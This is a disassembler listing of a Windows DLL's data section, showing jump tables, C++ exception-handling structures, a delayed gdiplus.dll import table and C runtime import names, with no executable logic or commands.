dd 122E2h
dd offset sub_10018621
dd 122E3h
dd offset sub_10018621
dd 122E4h
dd offset sub_10018621
dd 122E5h
dd offset sub_10018621
dd 122E6h
dd offset sub_10018621
dd 122E7h
dd offset sub_10018621
dd 122E8h
dd offset sub_10018621
dd 122E9h
dd offset sub_10018621
dd 122EAh
dd offset sub_10018621
dd 122EBh
dd offset sub_10018621
dd 122ECh
dd offset sub_10018621
dd 122EDh
dd offset sub_10018621
dd 122EEh
dd offset sub_10018621
dd 122EFh
dd offset sub_10018621
dd 11F0h
dd offset sub_100187EF
dd 122F1h
dd offset sub_10018621
dd 122F2h
dd offset sub_10018621
dd 122F3h
dd offset sub_10018621
dd 122F4h
dd offset sub_10018621
dd 122F5h
dd offset sub_10018621
dd 122F6h
dd offset sub_10018621
dd 122F7h
dd offset sub_10018621
dd 122F8h
dd offset sub_10018621
dd 122F9h
dd offset sub_10018621
dd 122FAh
dd offset sub_10018621
dd 122FBh
dd offset sub_10018621
dd 122FCh
dd offset sub_10018621
dd 122FDh
dd offset sub_10018621
dd 122FEh
dd offset sub_10018621
dd 11FFh
dd offset sub_100187EF
dd 2 dup(0)
byte_1001F738 db 0 ; DATA XREF: sub_1001AAF4+58�o
; sub_1001AB59+61�r ...
db 3 dup(1)
dd 2Fh dup(1010101h), 2020101h, 7 dup(2020202h), 4 dup(3030303h)
dd 4040404h, 1010104h, 2 dup(1010101h)
dword_1001F838 dd 1010100h, 3Fh dup(1010101h)dword_1001F938 dd 1010100h, 1Fh dup(1010101h), 2020201h, 7 dup(2020202h)
; DATA XREF: sub_1001AAF4+2C�o
dd 10h dup(1010101h), 4 dup(2020202h), 4 dup(1010101h)
aCbbbbbbbbaabba db 'cbbbbbbbbaabbabbbbbbbbbbbbbbbbbbabbbbbbbbbb>bbb?456789:;<=bbb`bbb'
db 0
dw 201h
db 3
db 4, 5, 6
db 7
db 8, 9, 0Ah
db 0Bh
db 0Ch, 0Dh, 0Eh
db 0Fh
db 10h, 11h, 12h
db 13h
db 14h, 15h, 16h
db 17h
db 18h, 19h, 62h
db 62h ; b
db 3 dup(62h)
db 62h ; b
db 1Ah, 1Bh, 1Ch
db 1Dh
db 1Eh, 1Fh, 20h
a_0123bbbbbbbbb db '!"#$%&',27h,'()*+,-./0123bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'
db 'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'
db 'bbbbbbbbbbbbbbbbbbbbbbbbb',0
align 10h
aGdiplus_dll db 'gdiplus.dll',0 ; DATA XREF: .rdata:10020464�o
dword_1001FB4C dd 1D5BE4B5h dword_1001FB50 dd 452DFA4Ah dword_1001FB54 dd 0B35DDD9Ch dword_1001FB58 dd 0EBE70551h dd offset dword_1001FBA0
off_1001FB60 dd offset sub_1001CB38 ; DATA XREF: sub_1001CB06+12�o
; sub_1001CB54+19�o ...
dd offset dword_1001FBE8
off_1001FB68 dd offset sub_1001CDC8 ; DATA XREF: .data:off_10024168�o
; .data:off_10024188�o
align 10h
off_1001FB70 dd offset off_10024168 ; DATA XREF: .rdata:off_1001FB88�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_1001FB88 dd offset off_1001FB70 ; DATA XREF: .rdata:1001FB9C�o
dword_1001FB8C dd 3 dup(0) dd 1
dd offset off_1001FB88
dword_1001FBA0 dd 3 dup(0) dd offset off_10024168
dd offset dword_1001FB8C+4
align 8
off_1001FBB8 dd offset off_10024188 ; DATA XREF: .rdata:off_1001FBD0�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_1001FBD0 dd offset off_1001FBB8 ; DATA XREF: .rdata:1001FBE4�o
dd 0
db 0 ; DATA XREF: .rdata:1001FBF8�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 1
dd offset off_1001FBD0
dword_1001FBE8 dd 3 dup(0) dd offset off_10024188
dd offset unk_1001FBD8
align 10h
stru_1001FC00 dd 19930520h ; Magic ; DATA XREF: SEH_100020B5�o
dd 4 ; Count
dd offset stru_1001FC00.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset sub_1001CDF0 ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001CDFC ; Info.Proc
dd 1 ; Info.Id
dd offset sub_1001CE08 ; Info.Proc
dd 2 ; Info.Id
dd offset sub_1001CE14 ; Info.Proc
stru_1001FC40 dd 19930520h ; Magic ; DATA XREF: SEH_10002FDE�o
dd 2 ; Count
dd offset stru_1001FC40.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset sub_1001CE2A ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001CE36 ; Info.Proc
stru_1001FC70 dd 19930520h ; Magic ; DATA XREF: SEH_10003786�o
dd 24 ; Count
dd offset stru_1001FC70.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset sub_1001CE4C ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001CE55 ; Info.Proc
dd 1 ; Info.Id
dd offset sub_1001CE5E ; Info.Proc
dd 2 ; Info.Id
dd offset sub_1001CE6A ; Info.Proc
dd 3 ; Info.Id
dd offset sub_1001CE76 ; Info.Proc
dd 4 ; Info.Id
dd offset sub_1001CE82 ; Info.Proc
dd 1 ; Info.Id
dd offset sub_1001CE8E ; Info.Proc
dd 6 ; Info.Id
dd offset sub_1001CE9A ; Info.Proc
dd 7 ; Info.Id
dd offset sub_1001CEA6 ; Info.Proc
dd 8 ; Info.Id
dd offset sub_1001CEB2 ; Info.Proc
dd 9 ; Info.Id
dd offset sub_1001CEBE ; Info.Proc
dd 10 ; Info.Id
dd offset sub_1001CECA ; Info.Proc
dd 11 ; Info.Id
dd offset sub_1001CED6 ; Info.Proc
dd 12 ; Info.Id
dd offset sub_1001CEE2 ; Info.Proc
dd 13 ; Info.Id
dd offset sub_1001CEEE ; Info.Proc
dd 13 ; Info.Id
dd offset sub_1001CEFA ; Info.Proc
dd 15 ; Info.Id
dd offset sub_1001CF06 ; Info.Proc
dd 16 ; Info.Id
dd offset sub_1001CF12 ; Info.Proc
dd 17 ; Info.Id
dd offset sub_1001CF1E ; Info.Proc
dd 18 ; Info.Id
dd offset sub_1001CF2A ; Info.Proc
dd 19 ; Info.Id
dd offset sub_1001CF36 ; Info.Proc
dd 20 ; Info.Id
dd offset sub_1001CF42 ; Info.Proc
dd 20 ; Info.Id
dd offset sub_1001CF4E ; Info.Proc
dd 20 ; Info.Id
dd offset sub_1001CF5A ; Info.Proc
stru_1001FD50 dd 19930520h ; Magic ; DATA XREF: SEH_10005BE3�o
dd 2 ; Count
dd offset stru_1001FD50.Info; InfoPtr
dd 1 ; CountDtr
dd offset stru_1001FD80 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd 0 ; Info.Proc
dd -1 ; Info.Id
dd 0 ; Info.Proc
stru_1001FD80 dd 0, 0, 1 ; _unk ; DATA XREF: .rdata:stru_1001FD50�o
dd 1 ; Count
dd offset stru_1001FD98 ; RttiBlkPtr
dd 0
stru_1001FD98 _msRttiDscr <0, 0, 0, offset loc_10005DEB>
; DATA XREF: .rdata:stru_1001FD80�o
stru_1001FDA8 dd 19930520h ; Magic ; DATA XREF: SEH_10005E66�o
dd 2 ; Count
dd offset stru_1001FDA8.Info; InfoPtr
dd 1 ; CountDtr
dd offset stru_1001FDD8 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd 0 ; Info.Proc
dd -1 ; Info.Id
dd 0 ; Info.Proc
stru_1001FDD8 dd 0, 0, 1 ; _unk ; DATA XREF: .rdata:stru_1001FDA8�o
dd 1 ; Count
dd offset stru_1001FDF0 ; RttiBlkPtr
dd 0
stru_1001FDF0 _msRttiDscr <0, 0, 0, offset loc_10006425>
; DATA XREF: .rdata:stru_1001FDD8�o
stru_1001FE00 dd 19930520h ; Magic ; DATA XREF: SEH_10006547�o
dd 2 ; Count
dd offset stru_1001FE00.Info; InfoPtr
dd 1 ; CountDtr
dd offset stru_1001FE30 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd 0 ; Info.Proc
dd -1 ; Info.Id
dd 0 ; Info.Proc
stru_1001FE30 dd 0, 0, 1 ; _unk ; DATA XREF: .rdata:stru_1001FE00�o
dd 1 ; Count
dd offset stru_1001FE48 ; RttiBlkPtr
dd 0
stru_1001FE48 _msRttiDscr <0, 0, 0, offset loc_10006DA6>
; DATA XREF: .rdata:stru_1001FE30�o
stru_1001FE58 dd 19930520h ; Magic ; DATA XREF: SEH_1000827F�o
dd 13 ; Count
dd offset stru_1001FE58.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset sub_1001CF8E ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001CF97 ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001CFA0 ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001CFA9 ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001CFB2 ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001CFBB ; Info.Proc
dd 5 ; Info.Id
dd offset sub_1001CFC4 ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001CFCD ; Info.Proc
dd 7 ; Info.Id
dd offset sub_1001CFD6 ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001CFDF ; Info.Proc
dd 9 ; Info.Id
dd offset sub_1001CFE8 ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001CFF1 ; Info.Proc
dd 11 ; Info.Id
dd offset sub_1001CFFA ; Info.Proc
stru_1001FEE0 dd 19930520h ; Magic ; DATA XREF: SEH_1000878F�o
dd 16 ; Count
dd offset stru_1001FEE0.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset sub_1001D00D ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001D016 ; Info.Proc
dd 1 ; Info.Id
dd offset sub_1001D01F ; Info.Proc
dd 1 ; Info.Id
dd offset sub_1001D02B ; Info.Proc
dd 1 ; Info.Id
dd offset sub_1001D037 ; Info.Proc
dd 1 ; Info.Id
dd offset sub_1001D043 ; Info.Proc
dd 1 ; Info.Id
dd offset sub_1001D04F ; Info.Proc
dd 1 ; Info.Id
dd offset sub_1001D05B ; Info.Proc
dd 1 ; Info.Id
dd offset sub_1001D067 ; Info.Proc
dd 1 ; Info.Id
dd offset sub_1001D073 ; Info.Proc
dd 1 ; Info.Id
dd offset sub_1001D07F ; Info.Proc
dd 1 ; Info.Id
dd offset sub_1001D08B ; Info.Proc
dd 1 ; Info.Id
dd offset sub_1001D097 ; Info.Proc
dd 1 ; Info.Id
dd offset sub_1001D0A3 ; Info.Proc
dd 1 ; Info.Id
dd offset sub_1001D0AF ; Info.Proc
dd 1 ; Info.Id
dd offset sub_1001D0BB ; Info.Proc
stru_1001FF80 dd 19930520h ; Magic ; DATA XREF: SEH_1000A318�o
dd 6 ; Count
dd offset stru_1001FF80.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset sub_1001D0D1 ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001D0DD ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001D0E9 ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001D0F5 ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001D101 ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001D10D ; Info.Proc
stru_1001FFD0 dd 19930520h ; Magic ; DATA XREF: SEH_1000D200�o
dd 1 ; Count
dd offset stru_1001FFD0.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset sub_1001D130 ; Info.Proc
stru_1001FFF8 dd 19930520h ; Magic ; DATA XREF: SEH_1000D300�o
dd 1 ; Count
dd offset stru_1001FFF8.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset sub_1001D150 ; Info.Proc
stru_10020020 dd 19930520h ; Magic ; DATA XREF: SEH_1000D410�o
dd 1 ; Count
dd offset stru_10020020.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset sub_1001D170 ; Info.Proc
stru_10020048 dd 19930520h ; Magic ; DATA XREF: SEH_1000D4E0�o
dd 1 ; Count
dd offset stru_10020048.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset sub_1001D190 ; Info.Proc
stru_10020070 dd 19930520h ; Magic ; DATA XREF: SEH_1000D590�o
dd 1 ; Count ; Microsoft VisualC 2-8/net runtime
dd offset stru_10020070.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset unknown_libname_2; Info.Proc
stru_10020098 dd 19930520h ; Magic ; DATA XREF: SEH_1000DB80�o
dd 1 ; Count ; Microsoft VisualC 2-8/net runtime
dd offset stru_10020098.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset unknown_libname_3; Info.Proc
stru_100200C0 dd 19930520h ; Magic ; DATA XREF: SEH_10013E02�o
dd 2 ; Count
dd offset stru_100200C0.Info; InfoPtr
dd 1 ; CountDtr
dd offset stru_100200F0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd 0 ; Info.Proc
dd -1 ; Info.Id
dd 0 ; Info.Proc
stru_100200F0 dd 0, 0, 1 ; _unk ; DATA XREF: .rdata:stru_100200C0�o
dd 1 ; Count
dd offset stru_10020108 ; RttiBlkPtr
dd 0
stru_10020108 _msRttiDscr <0, 0, 0, offset loc_100142C8>
; DATA XREF: .rdata:stru_100200F0�o
stru_10020118 dd 19930520h ; Magic ; DATA XREF: SEH_100142FF�o
dd 2 ; Count
dd offset stru_10020118.Info; InfoPtr
dd 1 ; CountDtr
dd offset stru_10020148 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd 0 ; Info.Proc
dd -1 ; Info.Id
dd 0 ; Info.Proc
stru_10020148 dd 0, 0, 1 ; _unk ; DATA XREF: .rdata:stru_10020118�o
dd 1 ; Count
dd offset stru_10020160 ; RttiBlkPtr
dd 0
stru_10020160 _msRttiDscr <0, 0, 0, offset loc_10014732>
; DATA XREF: .rdata:stru_10020148�o
stru_10020170 dd 19930520h ; Magic ; DATA XREF: SEH_10014769�o
dd 2 ; Count
dd offset stru_10020170.Info; InfoPtr
dd 1 ; CountDtr
dd offset stru_100201A0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd 0 ; Info.Proc
dd -1 ; Info.Id
dd 0 ; Info.Proc
stru_100201A0 dd 0, 0, 1 ; _unk ; DATA XREF: .rdata:stru_10020170�o
dd 1 ; Count
dd offset stru_100201B8 ; RttiBlkPtr
dd 0
stru_100201B8 _msRttiDscr <0, 0, 0, offset loc_10014833>
; DATA XREF: .rdata:stru_100201A0�o
stru_100201C8 dd 19930520h ; Magic ; DATA XREF: SEH_10014871�o
dd 2 ; Count
dd offset stru_100201C8.Info; InfoPtr
dd 1 ; CountDtr
dd offset stru_100201F8 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd 0 ; Info.Proc
dd -1 ; Info.Id
dd 0 ; Info.Proc
stru_100201F8 dd 0, 0, 1 ; _unk ; DATA XREF: .rdata:stru_100201C8�o
dd 1 ; Count
dd offset stru_10020210 ; RttiBlkPtr
dd 0
stru_10020210 _msRttiDscr <0, 0, 0, offset loc_100148F8>
; DATA XREF: .rdata:stru_100201F8�o
stru_10020220 dd 19930520h ; Magic ; DATA XREF: SEH_10014916�o
dd 2 ; Count
dd offset stru_10020220.Info; InfoPtr
dd 1 ; CountDtr
dd offset stru_10020250 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd 0 ; Info.Proc
dd -1 ; Info.Id
dd 0 ; Info.Proc
stru_10020250 dd 0, 0, 1 ; _unk ; DATA XREF: .rdata:stru_10020220�o
dd 1 ; Count
dd offset stru_10020268 ; RttiBlkPtr
dd 0
stru_10020268 _msRttiDscr <0, 0, 0, offset loc_10014ADB>
; DATA XREF: .rdata:stru_10020250�o
stru_10020278 dd 19930520h ; Magic ; DATA XREF: SEH_10014B0F�o
dd 2 ; Count
dd offset stru_10020278.Info; InfoPtr
dd 1 ; CountDtr
dd offset stru_100202A8 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd 0 ; Info.Proc
dd -1 ; Info.Id
dd 0 ; Info.Proc
stru_100202A8 dd 0, 0, 1 ; _unk ; DATA XREF: .rdata:stru_10020278�o
dd 1 ; Count
dd offset stru_100202C0 ; RttiBlkPtr
dd 0
stru_100202C0 _msRttiDscr <0, 0, 0, offset loc_10015B9F>
; DATA XREF: .rdata:stru_100202A8�o
stru_100202D0 dd 19930520h ; Magic ; DATA XREF: SEH_10015BF1�o
dd 2 ; Count
dd offset stru_100202D0.Info; InfoPtr
dd 1 ; CountDtr
dd offset stru_10020300 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd 0 ; Info.Proc
dd -1 ; Info.Id
dd 0 ; Info.Proc
stru_10020300 dd 0, 0, 1 ; _unk ; DATA XREF: .rdata:stru_100202D0�o
dd 1 ; Count
dd offset stru_10020318 ; RttiBlkPtr
dd 0
stru_10020318 _msRttiDscr <0, 0, 0, offset loc_10016A7F>
; DATA XREF: .rdata:stru_10020300�o
stru_10020328 dd 19930520h ; Magic ; DATA XREF: .text:loc_1001D240�o
dd 1 ; Count
dd offset stru_10020328.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset sub_1001D238 ; Info.Proc
stru_10020350 dd 19930520h ; Magic ; DATA XREF: .text:loc_1001D254�o
dd 1 ; Count
dd offset stru_10020350.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset sub_1001D24C ; Info.Proc
stru_10020378 dd 19930520h ; Magic ; DATA XREF: .text:loc_1001D278�o
dd 3 ; Count
dd offset stru_10020378.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset sub_1001D260 ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001D268 ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001D270 ; Info.Proc
stru_100203B0 dd 19930520h ; Magic ; DATA XREF: .text:loc_1001D2BB�o
dd 5 ; Count
dd offset stru_100203B0.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset sub_1001D284 ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001D29B ; Info.Proc
dd 1 ; Info.Id
dd offset sub_1001D2A3 ; Info.Proc
dd 1 ; Info.Id
dd offset sub_1001D2AB ; Info.Proc
dd 3 ; Info.Id
dd offset sub_1001D2B3 ; Info.Proc
stru_100203F8 dd 19930520h ; Magic ; DATA XREF: .text:loc_1001D2E7�o
dd 2 ; Count
dd offset stru_100203F8.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset sub_1001D2C8 ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1001D2DF ; Info.Proc
dword_10020428 dd 0 dd offset off_10024168
dd 0
dd 0FFFFFFFFh, 0
dd 10h
dd offset sub_1001CB54
align 8
dword_10020448 dd 1 dd offset dword_10020428
dword_10020450 dd 0 dd offset sub_1001CB81
dd 0
dd offset dword_10020448
gdiplus_dll_import_table dd 0 ; DATA XREF: GdipGetImageEncodersSize_thunk:loc_1001AD34�o
; Attributes
dd offset aGdiplus_dll ; "gdiplus.dll"
dd offset gdiplus_dll_handle ; Module handle
dd offset GdipGetImageEncodersSize ; Delayed Import Address Table
dd offset gdiplus_dll_dint ; Delayed Import Name Table
dd offset gdiplus_dll_dbiat ; Bound Delayed Import Address Table
dd 0 ; Unload Delayed Import Table
dd 0 ; Time stamp
dd 8 dup(0)
gdiplus_dll_dint dd offset word_100204D0 ; DATA XREF: .rdata:10020470�o
; gdiplus.dll delayed import name table
dd offset word_100204EC
dd offset word_10020504
dd offset word_1002051A
dd offset word_1002052E
dd offset word_1002053A
dd offset word_1002054C
dd offset word_10020558
dd offset word_10020576
dd offset word_1002058E
dd offset word_100205A0
dd 0
word_100204D0 dw 0 ; DATA XREF: .rdata:gdiplus_dll_dint�o
aGdipgetimageen db 'GdipGetImageEncodersSize',0
align 4
word_100204EC dw 0 ; DATA XREF: .rdata:100204A4�o
aGdipgetimage_1 db 'GdipGetImageEncoders',0
db 42h
word_10020504 dw 0 ; DATA XREF: .rdata:100204A8�o
aGdipsaveimaget db 'GdipSaveImageToFile',0
word_1002051A dw 0 ; DATA XREF: .rdata:100204AC�o
aGdipdisposeima db 'GdipDisposeImage',0
db 72h
word_1002052E dw 0 ; DATA XREF: .rdata:100204B0�o
aGdipfree db 'GdipFree',0
db 0FFh
word_1002053A dw 0 ; DATA XREF: .rdata:100204B4�o
aGdipcloneimage db 'GdipCloneImage',0
db 70h
word_1002054C dw 0 ; DATA XREF: .rdata:100204B8�o
aGdipalloc db 'GdipAlloc',0
word_10020558 dw 0 ; DATA XREF: .rdata:100204BC�o
aGdipcreatebitm db 'GdipCreateBitmapFromHBITMAP',0
word_10020576 dw 0 ; DATA XREF: .rdata:100204C0�o
aGdipclonebitma db 'GdipCloneBitmapAreaI',0
align 2
word_1002058E dw 0 ; DATA XREF: .rdata:100204C4�o
aGdiplusstartup db 'GdiplusStartup',0
align 10h
word_100205A0 dw 0 ; DATA XREF: .rdata:100204C8�o
aGdiplusshutdow db 'GdiplusShutdown',0
align 4
gdiplus_dll_dbiat dd 0 ; DATA XREF: .rdata:10020474�o
; gdiplus.dll bound delayed import address table
dd 0Bh dup(0)
dd 208D4h, 2 dup(0)
dd 20C92h, 1E200h, 20780h, 2 dup(0)
dd 2118Ah, 1E0ACh, 209FCh, 2 dup(0)
dd 213EAh, 1E328h, 20754h, 2 dup(0)
dd 214A4h, 1E080h, 206D4h, 2 dup(0)
dd 215BCh, 1E000h, 20B0Ch, 2 dup(0)
dd 215FEh, 1E438h, 209C8h, 2 dup(0)
dd 21608h, 1E2F4h, 209F0h, 2 dup(0)
dd 2163Ah, 1E31Ch, 20AC8h, 2 dup(0)
dd 2165Ch, 1E3F4h, 20A8Ch, 2 dup(0)
dd 217A0h, 1E3B8h, 20718h, 2 dup(0)
dd 2190Ah, 1E044h, 5 dup(0)
dd 21B00h, 214BCh, 214D0h, 214E0h, 214F0h, 21500h, 2150Eh
dd 21520h, 21532h, 2154Ah, 21562h, 21576h, 21588h, 21598h
dd 215ACh, 214AEh, 0
dd 218E8h, 218D2h, 218C0h, 218A0h, 21890h, 2186Ch, 21854h
dd 21844h, 21826h, 21810h, 217F2h, 217CEh, 217BCh, 217ACh
dd 0
dd 21490h, 2147Ah, 21464h, 21454h, 21446h, 2142Ch, 21406h
dd 21412h, 21422h, 213F6h, 0
dd 20CFAh, 20D08h, 20D14h, 20D2Ah, 20D3Eh, 20D4Ah, 20D5Ch
dd 20D6Ch, 20D78h, 20D86h, 20D94h, 20DA0h, 20DB2h, 20DC8h
dd 20DDEh, 20CECh, 20E04h, 20E14h, 20E30h, 20E46h, 20E54h
dd 20E64h, 20E74h, 20E84h, 20E92h, 20EA8h, 20EB6h, 20ECEh
dd 20EE6h, 20EFCh, 20CE0h, 20F1Ch, 20F28h, 20F36h, 20F44h
dd 20F4Ch, 20F5Ch, 20F68h, 20F7Ah, 20F8Ah, 20F9Eh, 20FAEh
dd 20FC4h, 20FD4h, 20FEEh, 20FFEh, 2100Eh, 2101Ah, 2102Ah
dd 2103Ch, 21054h, 2106Ch, 21088h, 210A2h, 210BCh, 210CEh
dd 210E2h, 210F0h, 21102h, 21118h, 21128h, 2113Ch, 2114Ah
dd 21156h, 21160h, 2116Ch, 21178h, 20CD2h, 20CC6h, 20CBAh
dd 20F08h, 20DF4h, 21AEEh, 21AD8h, 21AC8h, 21AB8h, 21AA8h
dd 21A94h, 21A80h, 21A68h, 21A58h, 21A46h, 21A28h, 21A18h
dd 0
dd 21A00h, 219EAh, 219E2h, 219D6h, 219CEh, 219C4h, 219BCh
dd 219B0h, 219A8h, 20B26h, 2199Eh, 21992h, 2198Ah, 21982h
dd 21976h, 2196Ah, 21960h, 20B30h, 20B3Ah, 20B44h, 20B4Eh
dd 20CAAh, 20C9Eh, 20C88h, 20C7Ah, 20C70h, 20C68h, 20C5Eh
dd 20C54h, 20C4Ah, 20C40h, 20C2Ch, 20C24h, 20C1Ch, 20C12h
dd 20C08h, 20BFEh, 20BF4h, 20BECh, 20BDCh, 20BD2h, 20BC2h
dd 20BB8h, 21956h, 21948h, 2193Ah, 21930h, 20B58h, 20B62h
dd 20B6Ch, 20B74h, 20B7Eh, 20B88h, 20B92h, 20B9Ch, 21928h
dd 21920h, 21916h, 20BB0h, 20B1Ch, 0
dd 80000095h, 80000096h, 80000009h, 80000008h, 8000000Ah
dd 80000006h, 80000007h, 800000C8h, 80000002h, 0
dd 21616h, 21628h, 0
dd 21200h, 21212h, 21226h, 21232h, 2123Eh, 21254h, 21268h
dd 21284h, 21296h, 212ACh, 212C6h, 212D8h, 212E8h, 212F4h
dd 211F2h, 2131Ch, 21330h, 21346h, 21352h, 2135Eh, 2136Ah
dd 2137Eh, 213A0h, 213ACh, 213B8h, 213C4h, 213CCh, 213DCh
dd 211DEh, 21308h, 21392h, 21198h, 211A8h, 211BCh, 211CCh
dd 0
dd 21668h, 21684h, 2169Ah, 216B8h, 216CCh, 216E0h, 216F4h
dd 21708h, 2171Eh, 21732h, 21746h, 2175Ah, 21772h, 21788h
dd 0
dd 21650h, 80000006h, 8000006Fh, 80000005h, 80000033h
dd 21646h, 80000013h, 80000012h, 80000010h, 80000073h
dd 80000034h, 80000009h, 80000017h, 80000004h, 80000003h
dd 8000000Ch, 0
dd 215ECh, 215DCh, 215CAh, 0
db 0BFh ; ¿
db 2, 73h, 74h
aRncat db 'rncat',0
dw 2BEh
aStrlen db 'strlen',0
align 10h
db 99h ; ™
db 2, 6Dh, 65h
aMset db 'mset',0
align 2
dw 291h
aMalloc db 'malloc',0
align 4
db 0B7h ; ·
db 2, 73h, 74h
aRchr db 'rchr',0
align 2
dw 2C1h
aStrncpy db 'strncpy',0
db 0C5h ; Å
db 2, 73h, 74h
aRstr db 'rstr',0
align 2
dw 2B6h
aStrcat db 'strcat',0
align 4
db 5Eh ; ^
db 2, 66h, 72h
db 65h ; e
db 65h, 2 dup(0)
db 0C3h ; Ã
db 2, 73h, 74h
aRrchr db 'rrchr',0
dw 2B8h
aStrcmp db 'strcmp',0
align 4
db 0BAh ; º
db 2, 73h, 74h
aRcpy db 'rcpy',0
align 2
dw 2B2h
aSprintf db 'sprintf',0
aI_5 db 'I',0
a__cxxframehand db '__CxxFrameHandler',0
db 0A6h ; ¦
db 2, 72h, 61h
db 6Eh ; n
db 64h, 2 dup(0)
db 0E1h ; á
db 2, 77h, 63h
aScmp db 'scmp',0
align 2
dw 10h
a??3@yaxpax@z db '??3@YAXPAX@Z',0
align 2
dw 240h
aCalloc db 'calloc',0
align 4
db 0Fh
align 2
a??2@yapaxi@z db '??2@YAPAXI@Z',0
align 4
db 3Dh ; =
db 2, 61h, 74h
db 6Fh ; o
db 69h, 2 dup(0)
db 97h ; —
db 2, 6Dh, 65h
aMcpy db 'mcpy',0
align 2
dw 2E6h
aWcslen db 'wcslen',0
align 4
db 73h ; s
db 2, 69h, 73h
aDigit db 'digit',0
dw 271h
aIsalpha db 'isalpha',0
db 0B4h ; ´
db 2, 73h, 72h
db 61h ; a
db 6Eh, 64h, 0
db 0D0h ; Ð
db 2, 74h, 69h
db 6Dh ; m
db 65h, 2 dup(0)
db 0CAh ; Ê
align 2
a_except_handle db '_except_handler3',0
align 10h
db 0A7h ; §
db 2, 72h, 65h
aAlloc db 'alloc',0
dw 2B5h
aSscanf db 'sscanf',0
align 4
db 9Eh ; ž
db 2, 70h, 72h
aIntf db 'intf',0
align 2
dw 258h
aFprintf db 'fprintf',0
db 13h
db 1, 5Fh, 69h
db 6Fh ; o
db 62h, 2 dup(0)
db 0C0h ; À
db 2, 73h, 74h
aRncmp db 'rncmp',0
aU_0 db 'U',0
a__dllonexit db '__dllonexit',0
db 86h ; †
db 1, 5Fh, 6Fh
aNexit db 'nexit',0
aMsvcrt_dll db 'MSVCRT.dll',0
align 2
dw 10Fh
a_initterm db '_initterm',0
aA db '',0
a_adjust_fdiv db '_adjust_fdiv',0
align 2
dw 302h
aLstrcpya db 'lstrcpyA',0
align 2
dw 308h
aLstrlena db 'lstrlenA',0
align 2
db 1Bh,0
aClosehandle db 'CloseHandle',0
db 18h
db 2, 52h, 65h
aAdfile db 'adFile',0
align 4
db 12h
